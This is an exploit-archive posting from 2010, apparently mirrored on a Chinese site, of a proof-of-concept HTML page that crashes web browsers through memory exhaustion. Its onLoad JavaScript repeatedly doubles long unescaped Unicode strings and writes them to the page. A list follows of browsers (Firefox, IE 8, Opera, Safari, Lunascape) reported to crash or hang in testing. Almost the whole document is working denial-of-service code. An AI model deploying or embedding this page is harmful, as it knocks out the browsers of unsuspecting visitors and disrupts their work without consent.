All Browsers - Long Unicode DoS PoC
来源 作者:Dr_IDE 发布时间:2010-05-04
<html> <title>Dr_IDE - All Browsers - Long Unicode DoS PoC</title> <head> <script> function boom() { //The number of strings increases the amount of memory consumed, quicker crash where applicable. var longunistring1 = unescape("%u4141%u4141"); var longunistring2 = unescape("%u4242%u4242"); var longunistring3 = unescape("%u4343%u4343"); var longunistring4 = unescape("%u4444%u4444"); for(i=0; i <= 60 ; ++i) //This number is very sensitive. If you go far over 60 IE won't "work" { longunistring1+=longunistring1; longunistring2+=longunistring2; longunistring3+=longunistring3; longunistring4+=longunistring4; document.write(longunistring1); document.write(longunistring2); document.write(longunistring3); document.write(longunistring4); } document.write(longunistring1); document.write(longunistring2); document.write(longunistring3); document.write(longunistring4); } </script> </head> <body onLoad="boom()"> <br>Tested on Windows 7: <br>Firefox 3.6.4 (CrashReporter) <br>IE 8.0.7600.16385 (Hangs, must quit) <br>Lunascape6 (Crashes with Gecko Engine)[Firefox mode] <br>Lunascape6 (Crashes with Webkit Engine)[Safari mode] <br>Lunascape6 (Crashes with Trident Engine)[IE mode] <br>Opera 10.51 (Hangs, must kill) <br>Safari 4.0.5 (Hangs, must kill) </body> </html>
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